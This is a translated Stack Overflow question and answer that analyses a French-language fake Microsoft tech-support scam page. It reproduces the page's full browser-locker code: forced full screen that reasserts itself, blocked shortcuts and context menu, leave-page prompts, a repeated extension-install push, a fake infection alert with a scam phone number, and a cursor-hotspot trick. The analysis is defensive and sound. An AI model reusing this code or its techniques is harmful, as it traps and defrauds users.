这部分代码如何能够在浏览器窗口之外修改鼠标指针?

时间:2018-05-02 12:57:31

标签: javascript malware

技术支持诈骗者总是想方设法让窗口难以关闭,以达到诈骗目的。

在这个案例中,这段代码的一部分目的是让用户难以勾选"阻止此页面创建其他对话框"复选框——否则受害者就可以关闭窗口。它以某种方式干扰了鼠标光标,使受害者很难把指针准确移到复选框上。我不明白这是如何实现的:

我在StackOverflow的帖子中删去了一大段数据(blob),完整版本可以在这里找到:https://pastebin.com/E57AQjGj

供以后的访客参考,这是那个光标图片(来自Tschallacka的答案),这里加了灰色背景(原图的背景通常是透明的):

fake cursor

这是截至2018年5月的典型Microsoft技术支持骗局的代码:

<html xmlns="http:/www.w3.org/1999/xhtml">
<head>
<meta name="robots" content="noindex,nofollow">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title> Information </title>
<link href="index_files/bootstrap.css" rel="stylesheet">
<link href="index_files/style.css" rel="stylesheet">
<link href="index_files/translator.css" id="SL_Style" type="text/css" rel="stylesheet">
<link href="index_files/alert.css" rel="stylesheet">
<link href="https://chrome.google.com/webstore/detail/ghbmnnjooekpmoecnnnilnnbdlolhkhi" rel="chrome-webstore-item">
<style>
  html {
    overflow: hidden;
  }
</style>
<script>
  /*
  window.alert = function(al) {
    return function(msg) {
      al(msg);
     var event = new CustomEvent('alert_clicked');
       document.dispatchEvent(event);
    };
  }(window.alert);

  document.addEventListener('alert_clicked', function() {
    setTimeout(function() {
      toggleFullScreen();
    }, 1000)
  }, false);
  */
</script>
<script>
  /**
   * Reads one query-string parameter from location.search.
   *
   * Builds the pattern `name=(.+?)(&|$)`, takes the first capture group and
   * passes it through decodeURI; returns '' when nothing matches.
   *
   * NOTE(review): the pattern is not anchored to `?` or `&`, so a short name
   * such as "n" can also match the tail of a longer parameter name. When
   * triaging a captured URL, read the raw query string rather than trusting
   * the value this helper would return.
   */
  function getURLParameter(name) {
    return decodeURI((RegExp(name + '=' + '(.+?)(&|$)').exec(location.search) || [,null])[1] || '');
  }
  var error = getURLParameter('error');
</script>
<audio id="play" loop><source src="fr.mp3" type="audio/mpeg"></audio>
<!--<audio autoplay="autoplay" loop="">
  <source src="index_files/gb.mp3" type="audio/mpeg">
</audio>-->
<script type="text/javascript">
var stroka = "<tr><td valign='top'><table width='100%' height='61' cellpadding='0' cellspacing='0' border='0'><tr><td width='766'><img src=''></td></tr></table></td></tr>";
</script>
<script type="text/javascript">
  /**
   * Despite the name, this only ever ENTERS full screen: when no element is
   * currently full screen it calls the first available of requestFullscreen,
   * mozRequestFullScreen or webkitRequestFullscreen on the root element.
   * There is no branch that leaves full screen.
   *
   * Analyst note: every caller on this page is a keyup or click handler.
   * Browsers only honour full-screen requests made from a user gesture, which
   * is presumably why the call is attached to input events rather than run at
   * load time. Full screen hides the browser chrome (tabs, address bar, close
   * button), which is what makes the page look like a system-level alert.
   */
  function toggleFullScreen() {
    if (!document.fullscreenElement && !document.mozFullScreenElement && !document.webkitFullscreenElement) {
      if (document.documentElement.requestFullscreen) {
        document.documentElement.requestFullscreen();
      } else if (document.documentElement.mozRequestFullScreen) {
        document.documentElement.mozRequestFullScreen();
      } else if (document.documentElement.webkitRequestFullscreen)
{document.documentElement.webkitRequestFullscreen(Element.ALLOW_KEYBOARD_INPUT);
      }
    }
  }
</script>

<script type="text/javascript">
  // keyCode 27 is Escape, the key browsers use to leave full screen.
  // On its keyup this listener immediately asks for full screen again, so the
  // user's exit is undone. A page that re-requests full screen in response to
  // Escape is a useful indicator when classifying browser-locker pages.
  document.addEventListener('keyup', function(es) {
    if (es.keyCode === 27) {
      toggleFullScreen();
    }
  }, false);
</script>

<script type="text/javascript">
  // Same pattern for four more keys: 122 (F11), 17 (Ctrl), 18 (Alt) and
  // 13 (Enter). On keyup the handler rewrites #map with the `stroka` markup and
  // requests full screen again. F11 is the browser's own full-screen toggle and
  // Ctrl/Alt begin the usual close-tab / switch-window shortcuts, so each
  // attempt to get away is turned into another full-screen request.
  document.addEventListener('keyup', function(e) {
    if (e.keyCode === 122 || e.keyCode === 17 || e.keyCode === 18 || e.keyCode === 13) {
      document.getElementById('map').innerHTML = stroka;
      toggleFullScreen();
    }
  }, false);
</script>

<script type="text/javascript">
  // Installs a document-wide click handler once the page has loaded.
  // NOTE(review): window.onload is assigned a second time by the script near
  // the end of <body>; a later assignment replaces this one, so this handler
  // may never be installed in practice - confirm in a sandboxed browser.
  window.onload = function () {
    document.onclick = function (e) {
      e = e || event;
      // `target` is assigned without a declaration (implicit global).
      target = e.target || e.srcElement;

      // Both branches below are identical, so the tagName test has no effect:
      // any click requests full screen, switches the body cursor to
      // 'not-allowed', rewrites #map and writes a 12x12 off-screen iframe
      // into #fa.
      // NOTE(review): no element with id "fa" appears in the markup shown in
      // this listing; if it is absent, the getElementById('fa') line throws.
      if (target.tagName === "DIV") {
        toggleFullScreen();
        document.body.style.cursor = 'not-allowed';
        document.getElementById('map').innerHTML = stroka;
        document.getElementById('fa').innerHTML = "<iframe src='#' width='12' height='12' style='position: absolute; left: -25px;'></iframe>";
      } else {
        toggleFullScreen();
        document.body.style.cursor = 'not-allowed';
        document.getElementById('map').innerHTML = stroka;
        document.getElementById('fa').innerHTML = "<iframe src='#' width='12' height='12' style='position: absolute; left: -25px;'></iframe>";
      }
    }
  }
</script>

<script type="text/javascript">
  // Window-level click listener: rewrites #map, starts the looping
  // <audio id="play"> element (fr.mp3) and, if `isFullScreen` is false,
  // requests full screen through whichever prefixed method exists.
  // Playback is started from a click, presumably because browsers block
  // unprompted audio; the looping voice alarm is part of the pressure on the
  // victim.
  // `isFullScreen` is declared in a later script and evaluated once at parse
  // time; nothing visible in this listing updates it afterwards.
  addEventListener("click", function() {
    document.getElementById('map').innerHTML = stroka;
     document.getElementById("play").play();
    if (!isFullScreen) {
      var el = document.documentElement,
          rfs = el.requestFullScreen || el.webkitRequestFullScreen || el.mozRequestFullScreen;
      rfs.call(el);
    }
  });
</script>
</head>
<body  onkeydown="return hCPNapvlhFicLoDm(event)" oncontextmenu="return false" style="cursor: url(&quot;&quot;) 128 128, crosshair;">
<!-- <canvas id="canvasElement"></canvas> -->
<audio autoplay="autoplay" loop="">
    <source src="fr.mp3" type="audio/mpeg">
</audio>  
<div id="coFrameDiv" style="height:0px;display:none;">
  <iframe id="coToolbarFrame" src="index_files/a.htm" style="height:0px;width:100%;display:none;"></iframe>
</div>
<a id="elem" href="#" style="display: none;"></a>
<span id="audioarea"></span>
<table width="100%" cellspacing="0" cellpadding="0" border="0">
  <tbody>
    <tr>
      <td valign="top" align="center"><div id="map"></div>
      </td>
    </tr>
  </tbody>
</table>
<nav class="navbar navbar-default navbar-static-tops">
  <div class="container">
    <div class="navbar-header">
      <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar">
        <span class="sr-only">Navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
      <a class="navbar-brand" href="#">
        <img src="index_files/windows.png" alt="Windows">
      </a>
    </div>
    <div id="navbar" class="navbar-collapse collapse">
      <ul class="nav navbar-nav">
        <li class="dropdown">
          <a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false">Store<span class="caret"></span></a>
          <ul class="dropdown-menu">
            <li><a href="#">Téléchargement </a></li>
            <li><a href="#">Devices</a></li>
            <li><a href="#">Software</a></li>
            <li><a href="#">Apps</a></li>
            <li><a href="#">Games</a></li>
          </ul>
        </li>
        <li class="dropdown">
          <a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false">Products<span class="caret"></span></a>
          <ul class="dropdown-menu">
            <li><a href="#">Software &amp; services</a></li>
            <li><a href="#">Devices &amp; Xbox</a></li>
            <li><a href="#">For business</a></li>
          </ul>
        </li>
        <li><a href="#">Support</a></li>
      </ul>
      <ul class="nav navbar-nav navbar-right">
        <li><a href="#"><strong>Support technique : 09 70 38 74 17</strong></a></li>
      </ul>
    </div><!--/.nav-collapse-->
  </div>
</nav>
<div class="container">
  <div class="jumbotron">
    <div class="row">
      <div class="col-xs-6 text-left">
<h2>Attention</h2>
Ne pas éteindre ou réinitialiser votre ordinateur.
</br></br>
Votre ordinateur a été infecté.
</br></br>
Les données suivantes peuvent être compromises :
<br/><br/>
1. Mots de passe.
<br/>
2. Historique du navigateur.
<br/>
3. Informations sensibles (Cartes de crédit).
<br/>
4. Fichiers sur le disque dur.
<br/>
<br/>
Veuillez nous appeler dans les 5 prochaines minutes pour éviter que votre     ordinateur ne soit désactivé.
<br><br>
Appelez immédiatement au : <b>09 70 38 74 17</b> (Appel gratuit).
<br><br>
Ne pas ignorer cette alerte critique. Si vous fermez cette page, votre accès à l'ordinateur sera désactivé pour éviter d'autres dommages sur notre réseau.
<br><br>
Contactez-nous immédiatement afin que nos ingénieurs puissent vous guider à travers le processus de suppression par téléphone. Veuillez nous appeler dans les 5 prochaines minutes pour éviter que votre ordinateur ne soit désactivé.

      </div>

    </div>
  </div>

</div> 

<footer class="footer">
  <div class="container">
    <div class="row">
      <div class="col-md-4" style="text-align:left;">
        <h4>Support</h4>
        <ul style="padding:0px;">
          <li style="list-style: none; padding:10px 0px;"><a>Account support</a></li>
          <li style="list-style: none; padding:10px 0px;"><a>Supported products list</a></li>
          <li style="list-style: none; padding:10px 0px;"><a>Product support lifecycle</a></li>
        </ul>
      </div>
      <div class="col-md-4" style="text-align:left;">
        <h4>Security</h4>
        <ul style="padding:0px;">
          <li style="list-style: none; padding:10px 0px;"><a>Safety &amp; Security Center</a></li>
          <li style="list-style: none; padding:10px 0px;"><a>Download Security Essentials</a></li>
          <li style="list-style: none; padding:10px 0px;"><a>Malicious Software Removal Tool</a></li>
        </ul>
      </div>
      <div class="col-md-4" style="text-align:left;">
        <h4>Popular topics</h4>
        <ul style="padding:0px;">
          <li style="list-style: none; padding:10px 0px;"><a>Report a support scam</a></li>
          <li style="list-style: none; padding:10px 0px;"><a>Disability Answer Desk</a></li>
          <li style="list-style: none; padding:10px 0px;"><a>Locate Windows addresses worldwide</a></li>
          <li style="list-style: none; padding:10px 0px;"><a>Windows 10 help &amp; how-to</a></li>
          <li style="list-style: none; padding:10px 0px;"><a>Windows 10 Mobile help &amp; how-to</a></li>
          <li style="list-style: none; padding:10px 0px;"><a>Can't find Office applications in Windows 10,
              Windows 8, or WIndows 7?</a></li>
        </ul>
      </div>
    </div>
    <div class="row" style="font-size: 1.2rem; padding:30px 0px;">
      <div style="float:left;"><span class="glyphicon glyphicon-cd"></span><span>English(United States)</span>
      </div>
      <div style="float:right;">
        <span style="padding:0px 15px;">Terms of use</span>
        <span style="padding:0px 15px;">English(United States)</span>
        <span style="padding:0px 15px;">Trademarks</span>
        <span style="padding:0px 15px;">@2016 Windows</span>
      </div>
    </div>
  </div>
</footer>



<div id="chrome-alerts" class="chrome-alert">
  <div>
    <a href="javascript:openlink()" class="cross">×</a>
    <h1>Attention</h1>
    <div class="content-box" id="alert-content-box">
<p>
Votre ordinateur a été infecté.
</br></br>
Les données suivantes peuvent être compromises :
<br/><br/>
1. Mots de passe.
<br/>
2. Historique du navigateur.
<br/>
3. Informations sensibles (Cartes de crédit).
<br/>
4. Fichiers sur le disque dur.
<br/>
<br/>
Veuillez nous appeler dans les 5 prochaines minutes pour éviter que votre ordinateur ne soit désactivé.
<br><br>
Appelez immédiatement au : <b>09 70 38 74 17</b> (Appel gratuit).
<br><br>
Ne pas ignorer cette alerte critique. Si vous fermez cette page, votre accès à l'ordinateur sera désactivé pour éviter d'autres dommages sur notre réseau.
<br><br>
Contactez-nous immédiatement afin que nos ingénieurs puissent vous guider à travers le processus de suppression par téléphone. Veuillez nous appeler dans les 5 prochaines minutes pour éviter que votre ordinateur ne soit désactivé.
</p>
    </div>
    <label style="font-size: 12px;"><input type="checkbox"> Empêcher les boîtes de dialogue supplémentaires</label>
    <div class="action_buttons">
      <a class="active" id="leave_page">OK</a>
    </div>
  </div>
</div>
<script>
  // Tracking identifiers read by eKxJS2GzrfWPEjgm when it chooses which
  // postback request to send. subid and clickid are empty in this copy;
  // postback holds a fixed token (presumably a campaign/affiliate id - not
  // verifiable from this page alone).
  var subid = '';
  var clickid = '';
  var postback = 'wHBAN004C9IFC3951PRAFUP0';
  // Set to true by eKxJS2GzrfWPEjgm just before it calls
  // chrome.webstore.install and reset in that call's failure callback;
  // window.onblur reads it.
  var cl = false;
  // Evaluated once, when this script is parsed; not updated anywhere in the
  // code shown.
  var isFullScreen = !(!document.fullscreenElement && !document.msFullscreenElement && !document.mozFullScreenElement && !document.webkitFullscreenElement);
  // Second assignment to window.onload on this page (it replaces the handler
  // set in <head>). This one belongs to a forced-extension-install flow:
  // it only does work when the Chrome inline-install API is present.
  // NOTE(review): the markup in this listing has no <header> element and no
  // .gR3SfJr5l9O4jbWa node, so this script looks like it was carried over from
  // a different landing-page template - inferred, not confirmed.
  window.onload = function () {
    // Per-language strings for the fake "system notification". Several
    // entries reuse the English text, and the ru strings are '?' runs
    // (the original characters were lost to an encoding problem).
    var langs = {
      en: {
        img: 'ru_new.png',
        h3: 'System notification!',
        p: 'Important additions for your browser are downloading and installation is in progress. Press OK and install the extensions!'
      },
      ru: {
        img: 'ru_new.png',
        h3: '????????? ???????????!',
        p: '???????????? ???????? ? ????????? ??????? ?????????? ??? ?????? ????????. ??????? "??" ? ?????????? ???????????? ??????????.'
      },
      de: {
        img: 'ru_new.png',
        h3: 'Systembenachrichtigung!',
        p: 'Important additions for your browser are downloading and installation is in progress. Press OK and install the extensions!'
      },
      fr: {
        img: 'ru_new.png',
        h3: 'Avis de système !',
        p: 'Important additions for your browser are downloading and installation is in progress. Press OK and install the extensions!'
      },
      es: {
        img: 'ru_new.png',
        h3: '¡Notificación del sistema!',
        p: 'Se está realizando la descarga e instalación de una extensión importante para su navegador. Haga clic en  "Aceptar" e instale la extensión propuesta.'
      },
      pt: {
        img: 'ru_new.png',
        h3: 'Mensagem de sistema!',
        p: 'Importantes adições para o seu navegador estão sendo transferidas ea instalação está em andamento. Pressione OK e instale as extensões!'
      },
    };

    // Feature test for chrome.webstore.install (inline extension install).
    if (window.chrome !== undefined && window.chrome.webstore && window.chrome.webstore.install) {
      // Cookie bookkeeping: tmp_name marks a visitor for 24 hours.
      if (document.cookie.indexOf('tmp_name=') == -1) {
        setCookie('tmp_name', 'landing', 24);
      }
      // Looked up by the exact navigator.language string.
      var lang = langs[navigator.language];
      // Sends visitors who already carry both c_name and tmp_name cookies away.
      hTRnKeAy1lgYB4La();

      if (lang) {
        document.querySelector('header img').src = lang.img;
        document.querySelector('.gR3SfJr5l9O4jbWa h3').innerText = lang.h3;
        document.querySelector('.gR3SfJr5l9O4jbWa p').innerText = lang.p;
      }

      // First visit within the hour: set c_open and reload the same URL.
      if (document.cookie.indexOf('c_open' + '=') === -1) {
        setCookie('c_open', 'landing', 1);
        window.location.href = window.location.href;
      }
      try {
        document.querySelector('footer').style.display = 'none';
        document.querySelector('header').style.display = 'block';
      } catch (e) {}

    } else {
      // Browsers without the inline-install API: drop the leave-page prompt
      // and navigate to '#'. The '#' targets throughout this script look like
      // URLs that were blanked before the sample was posted - presumably.
      window.onbeforeunload = null;
      location.assign('#');
    }
  };
  // Uses window.innerHeight vs screen.height as a "are we full screen?" test
  // on every resize: when the two differ the <header> is shown and the
  // <footer> hidden, and the reverse when they match. Does nothing if the
  // page has no <header> element.
  window.onresize = function () {
    if (document.querySelector('header')) {
      if (window.innerHeight != screen.height) {
        document.querySelector('header').style.display = 'block';
        document.querySelector('footer').style.display = 'none';
      }
      else {
        document.querySelector('header').style.display = 'none';
        document.querySelector('footer').style.display = 'block';
      }
    }
  };
  // Returning a string from onbeforeunload makes the browser show its
  // "leave this page?" confirmation whenever the tab is closed or navigated
  // away, adding one more dialog between the victim and the exit. Other code
  // on this page sets the handler back to null before it navigates itself.
  window.onbeforeunload = function (ev) {
    return "You have to install extension !";
  };
  // Handler registered for both keyup and click on document.body (see the
  // addEventListener calls further down): it starts the extension-install flow
  // via eKxJS2GzrfWPEjgm and, one second later, requests full screen on <body>
  // through the webkit-prefixed API.
  function kzogExQSrDChY4Iq() {
    eKxJS2GzrfWPEjgm();
    setTimeout(function () {
      document.body.webkitRequestFullscreen();
    }, 1000);
  }
  /**
   * Writes a cookie on path "/".
   * @param a cookie name
   * @param b cookie value (concatenated as-is, no encoding)
   * @param c lifetime in hours; when falsy no expires attribute is added
   */
  function setCookie(a, b, c) {
    var d = '';
    if (c) {
      var e = new Date();
      // hours -> milliseconds
      e.setTime(e.getTime() + (c * 60 * 60 * 1000));
      d = '; expires=' + e.toUTCString()
    }
    // Leftover debug output: logs the expires fragment to the console.
    console.log(d);

    document.cookie = a + "=" + b + d + ";path=/";
  }
  // If both the c_name and tmp_name cookies are present, removes the
  // leave-page prompt and navigates to '#'. Only tmp_name is set by the code
  // shown here; c_name is not written anywhere in this listing.
  function hTRnKeAy1lgYB4La() {
    if (document.cookie.indexOf('c_name' + '=') !== -1 && document.cookie.indexOf('tmp_name=') !== -1) {
      window.onbeforeunload = null;
      location.assign('#');
    }
  }
  // Shows <footer> and hides <header>; any error (for example a missing
  // element) is swallowed by the empty catch.
  function gpAkSJDl9ENT5gLQ() {
    try {
      document.querySelector('footer').style.display = 'block';
      document.querySelector('header').style.display = 'none';
    } catch (e) {}
  }
  /**
   * Extension-install flow. In order: swaps footer/header visibility, leaves
   * full screen (so the browser's install prompt can be seen), fires a GET,
   * sets `cl`, then calls chrome.webstore.install with a success and a failure
   * callback.
   *
   * Every request and navigation target in this copy is '#' and the store URL
   * passed to install() is an empty string; presumably the real endpoints were
   * blanked before the sample was posted, so no network indicators can be
   * taken from this function.
   *
   * Success path: removes the onbeforeunload prompt, then sends a chain of
   * GETs chosen by clickid / subid / postback and finally navigates the tab
   * with open('#', '_self'). The onload and onerror branches are copies of
   * each other, so the chain continues whether or not a request succeeds.
   *
   * Failure path (the user declined or the install failed): resets `cl`, sends
   * one GET, logs the error, shows <header> again and leaves full screen after
   * 100 ms. Because kzogExQSrDChY4Iq is bound to every click and keyup, the
   * prompt is raised again on the next input.
   */
  function eKxJS2GzrfWPEjgm() {
    gpAkSJDl9ENT5gLQ();
    try {
      document.webkitCancelFullScreen();
    } catch (e) { }
    try {
      document.cancelFullscreen();
    } catch (e) { }
    // Fire-and-forget request issued before the prompt (response is ignored).
    var xhr = new XMLHttpRequest();
    xhr.open('GET', "#", true);
    xhr.send();
    // Tells window.onblur not to reload while the install prompt has focus.
    cl = true;
    chrome.webstore.install('', function () {
      // Success callback.
      window.onbeforeunload = null;
      var xhr = new XMLHttpRequest();
      xhr.open('GET', "#", true);
      xhr.onload = function () {
        if (clickid) {
          // Three chained postbacks, then navigate; error branches mirror the
          // success branches.
          var xhrPostback = new XMLHttpRequest();
          xhrPostback.open('GET', '#', true);
          xhrPostback.onload = function () {
            var xhrPostback1 = new XMLHttpRequest();
            xhrPostback1.open('GET', '#', true);
            xhrPostback1.onload = function () {
              var xhrPostback3 = new XMLHttpRequest();
              xhrPostback3.open('GET', '#', true);
              xhrPostback3.onload = function () {
                open('#', '_self');
              };
              xhrPostback3.onerror = function () {
                open('#', '_self');
              };
              xhrPostback3.send();
            };
            xhrPostback1.onerror = function () {
              var xhrPostback3 = new XMLHttpRequest();
              xhrPostback3.open('GET', '#', true);
              xhrPostback3.onload = function () {
                open('#', '_self');
              };
              xhrPostback3.onerror = function () {
                open('#', '_self');
              };
              xhrPostback3.send();
            };
            xhrPostback1.send();
          };
          xhrPostback.onerror = function () {
            var xhrPostback1 = new XMLHttpRequest();
            xhrPostback1.open('GET', '#', true);
            xhrPostback1.onload = function () {
              var xhrPostback3 = new XMLHttpRequest();
              xhrPostback3.open('GET', '#', true);
              xhrPostback3.onload = function () {
                open('#', '_self');
              };
              xhrPostback3.onerror = function () {
                open('#', '_self');
              };
              xhrPostback3.send();
            };
            xhrPostback1.onerror = function () {
              var xhrPostback3 = new XMLHttpRequest();
              xhrPostback3.open('GET', '#', true);
              xhrPostback3.onload = function () {
                open('#', '_self');
              };
              xhrPostback3.onerror = function () {
                open('#', '_self');
              };
              xhrPostback3.send();
            };
            xhrPostback1.send();
          };
          xhrPostback.send();
        } else if (subid) {
          // Single postback carrying subid appended to the URL.
          var xhrPostback = new XMLHttpRequest();
          xhrPostback.open('GET', '#' + subid, true);
          xhrPostback.onload = function () {
            open('#', '_self');
          };
          xhrPostback.onerror = function () {
            open('#', '_self');
          };
          xhrPostback.send();
        } else if (postback) {
          // Single postback carrying the fixed postback token; this is the
          // branch taken in this copy, where subid and clickid are empty.
          var xhrPostback = new XMLHttpRequest();
          xhrPostback.open('GET', '#' + postback, true);
          xhrPostback.onload = function () {
            open('#', '_self');
          };
          xhrPostback.onerror = function () {
            open('#', '_self');
          };
          xhrPostback.send();
        } else {
          open('#', '_self');
        }
      };
      xhr.onerror = function () {
        open('#', '_self');
      };
      xhr.send();
    }, function (error) {
        // Failure callback.
        cl = false;
        var xhr = new XMLHttpRequest();
        xhr.open('GET', "#", true);
        xhr.send();
        console.log(error);
        document.querySelector('footer').style.display = 'none';
        try {
          document.querySelector('header').style.display = 'block';
        } catch (v) {
        }
        setTimeout(function () {
          try {
            document.webkitCancelFullScreen();
          } catch (e) { }
          try {
            document.cancelFullscreen();
          } catch (e) { }
        }, 100);
    });
  }
  // onkeydown handler wired on <body>. Returning false cancels the default
  // action for key code 123 (F12, the usual developer-tools shortcut) and
  // 17 (Ctrl). Together with oncontextmenu="return false" on the same tag this
  // is an anti-inspection measure; it only affects in-page shortcuts, and the
  // browser's own menus remain available.
  function hCPNapvlhFicLoDm(e) {
    if (e.which === 123 || e.which === 17) {
      return false;
    }
  }
  // Dialog loop: shows a confirm() and calls itself again every time the user
  // presses Cancel, so the only way out through the dialog is OK. This is the
  // behaviour the browser's "prevent this page from creating additional
  // dialogs" checkbox exists to stop. The only call to this function in the
  // listing is commented out (inside dsfsf).
  function hxvw7JrbMUZBqVhN() {
    var c = confirm("You should install the chrome extension!");
    if (!c) {
      hxvw7JrbMUZBqVhN();
    }
  }
  // Any key release or click anywhere on the page starts the install flow
  // (kzogExQSrDChY4Iq). The first registration below is disabled in this copy.
  // document.body.addEventListener('keyup', f5WOxk2dF74GMRLf);
  document.body.addEventListener('keyup', kzogExQSrDChY4Iq);
  document.body.addEventListener('click', kzogExQSrDChY4Iq);
  // Stub that always returns false; its only registration is commented out,
  // so it is unused in this copy.
  function f5WOxk2dF74GMRLf() {
    return false;
  }
  // Mouse-leave detector: when the pointer moves to no element, or to the
  // <html> node, the page reloads itself. Its registration
  // (addEvent(document, "mouseout", dsfsf)) is commented out in this listing,
  // so it is inactive here.
  function dsfsf(e) {
    e = e ? e : window.event;
    var from = e.relatedTarget || e.toElement;
    if (!from || from.nodeName === "HTML") {
      // hxvw7JrbMUZBqVhN()
        window.location.href = window.location.href;
    }
  }
  // Cross-browser listener helper: uses addEventListener when available,
  // otherwise the legacy attachEvent with an "on" prefix. Its only call in
  // this listing is commented out.
  function addEvent(obj, evt, fn) {
    if (obj.addEventListener) {
      obj.addEventListener(evt, fn, false);
    } else if (obj.attachEvent) {
      obj.attachEvent("on" + evt, fn);
    }
  }
  // Counterpart of addEvent: removeEventListener when available, otherwise
  // the legacy detachEvent. Not called anywhere in the code shown.
  function removeEvent(obj, evt, fn) {
    if (obj.removeEventListener) {
      obj.removeEventListener(evt, fn, false);
    } else if (obj.detachEvent) {
      obj.detachEvent("on" + evt, fn);
    }
  }
  //addEvent(document, "mouseout", dsfsf);
  // When the window loses focus (the user switches to another window or tab)
  // and the page is neither flagged as full screen nor waiting on the install
  // prompt (`cl`), it reloads itself. Since `isFullScreen` is computed once at
  // parse time, the first condition depends on the state at page load.
  window.onblur = function() {
    if (!isFullScreen && !cl) {
      window.location.href = window.location.href;
    }
  };
</script>
<script type="text/javascript">
  // Reads the `n` and `red` query parameters (`error` was read in <head>).
  // NOTE(review): "nomer" suggests `n` carries a number - presumably the phone
  // number variant for the campaign; not confirmed by the code shown.
  var nomer = getURLParameter("n");
  var red = getURLParameter("red");
  // With red=y the page navigates to its own host and path over https, keeping
  // only n and error. The values are concatenated back into the URL without
  // re-encoding. For triage, n / red / error in a logged URL are the
  // parameters this template reads.
  if (red === "y") {
    document.location.href=("https://" + document.location.host + document.location.pathname + "?n=" + nomer + "&error=" + error);
  }
</script>
<script type="text/javascript">var _Hasync= _Hasync|| [];
_Hasync.push(['Histats.start', '1,3638954,4,0,0,0,00010000']);
_Hasync.push(['Histats.fasi', '1']);
_Hasync.push(['Histats.track_hits', '']);
(function() {
var hs = document.createElement('script'); hs.type = 'text/javascript';     hs.async = true;
hs.src = ('//s10.histats.com/js15_as.js');
(document.getElementsByTagName('head')[0] ||             document.getElementsByTagName('body')[0]).appendChild(hs);
})();</script>
<noscript><a href="/" target="_blank"><img  src="//sstatic1.histats.com/0.gif?3638954&101" alt="free hit counter code" border="0"></a></noscript>
</body>
</html>

1 个答案:

答案 0 :(得分:3)

他们通过将光标替换为128x128px的图像来实现。

请参阅下面的代码段并将鼠标悬停在按钮上。

这样,您实际点击的位置并不是您以为自己点击的位置。您看不到真正的点击位置,因此总是点不中那个小小的复选框。CSS中url()后面的两个数字(128 128)是光标热点的坐标,也就是这张图片内真正触发点击的那个点。

/* Replaces the pointer over the button with a custom image.
   The two numbers after url() are the hotspot x/y inside that image, i.e. the
   point that actually receives the click; `crosshair` is the fallback cursor
   used when the image cannot be loaded.
   NOTE(review): url("") is empty in this listing - presumably the image data
   was stripped from the post - so a browser would be expected to show the
   crosshair fallback here. */
button {
cursor: url("") 128 128, crosshair;
}
<button>
test
</button>